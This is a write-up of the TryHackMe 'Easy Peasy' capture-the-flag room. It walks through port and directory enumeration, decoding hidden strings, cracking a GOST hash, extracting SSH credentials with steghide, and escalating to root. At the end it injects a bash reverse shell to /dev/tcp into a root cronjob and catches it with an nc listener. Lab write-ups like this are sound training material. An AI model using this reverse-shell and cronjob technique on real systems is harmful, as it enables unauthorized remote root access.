TryHackMe - Easy Peasy

The room link can be found at TryHackMe - Easy Peasy

Enumeration

First we scan for open ports and services

Nmap

We use nmap with some default arguments.

sudo nmap -sV -sC -oA nmap/first $IP

It will return.

PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!

From the first scan we can see that port 80 is open with nginx version 1.16.1

All ports

So lets retry for all ports -p- in the background, using -v to increase the verbosity and removing the scripts -sC and version -sV parameters.

sudo nmap -v -p- -oA nmap/all $IP

This returns three ports open

PORT      STATE SERVICE
80/tcp    open  http
6498/tcp  open  unknown
65524/tcp open  unknown

Lets try to gather more information from those ports, scanning only those specifically.

sudo nmap -sC -sV -oA nmap/ports -p 80,65524,6498 $IP

The output is the following

PORT      STATE SERVICE VERSION
80/tcp    open  http    nginx 1.16.1
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: nginx/1.16.1
|_http-title: Welcome to nginx!
6498/tcp  open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 30:4a:2b:22:ac:d9:56:09:f2:da:12:20:57:f4:6c:d4 (RSA)
|   256 bf:86:c9:c7:b7:ef:8c:8b:b9:94:ae:01:88:c0:85:4d (ECDSA)
|_  256 a1:72:ef:6c:81:29:13:ef:5a:6c:24:03:4c:fe:3d:0b (ED25519)
65524/tcp open  http    Apache httpd 2.4.43 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.43 (Ubuntu)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

So summing up we have:

  1. HTTP port 80 with nginx
  2. SSH port 6498 with OpenSSH
  3. HTTP port 65524 with Apache

Gobuster

While scanning for other open ports lets start gobuster to enumerate directories on http port 80. We will use the Seclist big wordlist.

gobuster dir -o gobuster/nginx -w big.txt -u http://$IP/

Gobuster finds an hidden directory.

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/10 13:50:37 Starting gobuster
===============================================================
/hidden (Status: 301)
/robots.txt (Status: 200)
===============================================================
2020/08/10 13:54:18 Finished
===============================================================

Lets also scan the Apache server.

gobuster dir -o gobuster/apache -w big.txt -u http://$IP:65524/

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP:65524/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/10 13:54:08 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/robots.txt (Status: 200)
/server-status (Status: 403)
===============================================================
2020/08/10 13:57:18 Finished
===============================================================

Compromising

The second fase is a bit more confusing and the directions to find the flags arent clear, but the access on the box is and privilege escalation is straight forward.

Flag 1

Futher enumerating the hidden directory with gobuster we find another directory called wathever.

gobuster dir -o gobuster/hidden -w big.txt -u http://$IP/hidden/

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://$IP/hidden/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/08/10 14:13:44 Starting gobuster
===============================================================
/whatever (Status: 301)
===============================================================
2020/08/10 14:16:48 Finished
===============================================================

Viewing the source code of the page there is an hidden p with a base64 encoded string.

<p hidden>Z____________________Q==</p>

Decoding it we can find the first flag.

echo Z____________________Q== | base64 -d

flag{__________}

Flag 2

Using gobuster we have found robots.txt in the Apache server which shous us User-Agent.

User-Agent:*
Disallow:/
Robots Not Allowed
User-Agent:a______________________________0
Allow:/
This Flag Can Enter But Only This Flag No More Exceptions

The solution wasnt so good. You have to find the solution online in some obscure site searching for the hash :thinking:

flag{______________}

Flag 3

On the Apache home page we can find the third flag.

Fl4g 3 : flag{________________________________}

User Flag

On the Apache main page in the source we can see an hidden p again.

<p hidden>its encoded with ba....:O______________________u</p>

Since it is encoded with a base we open Chyberchef and try out a bunch of encodings.

With base62 we can find something that looks like an hidden directory.

/n0th1ng3ls3m4tt3r

On this page we find a long string and an image.

<p>9______________________________________________________________1</p>

The hint tell us that its GHOST, so we use hashcat and the wordlist that was provided to crack it.

hashcat -a 0 -m 6900 hash.txt easypeasy.txt

With a bit of guessing we can use steghide on the image to extract some data.

steghide extract -sf binarycodepixabay.jpg -p mypasswordforthatjob

The output are user and password information, the password is encoded in binary.

username:b____g
password:
01101001 01100011 01101111 01101110 01110110 01100101 01110010 01110100 01100101 01100100 01101101 01111001 01110000 01100001 01110011 01110011 01110111 01101111 01110010 01100100 01110100 01101111 01100010 01101001 01101110 01100001 01110010 01111001

Using Cyberchef we can get the credentials.

username: b____g
password: i__________________________y

Those are the credentials for the SSH. So when you access you can find the user flag.

User Flag But It Seems Wrong Like It`s Rotated Or Something
synt{a______________y}

Which is a rot13 of flag{________________}.

Root Flag

Uploading Linpeas on the box we can find a cronjob that is run as root and execute a script /var/www/.mysecretcronjob.sh.

* *    * * *   root    cd /var/www/ && sudo bash .mysecretcronjob.sh

We can put a reverse shell in the script to gain root access on the box.

bash -i >& /dev/tcp/$USER_IP/9000 0>&1

Open a listener and wait for the job to fire.

nc -lvnp 9000

The root flag is in a file /root/.root.txt

flag{________________________________}